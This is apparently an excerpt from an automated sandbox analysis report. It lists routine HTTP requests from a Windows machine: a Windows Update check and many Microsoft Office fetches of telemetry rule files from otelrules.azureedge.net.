                      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=HWvNagD4okpHDot&MD=86O4NVBB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
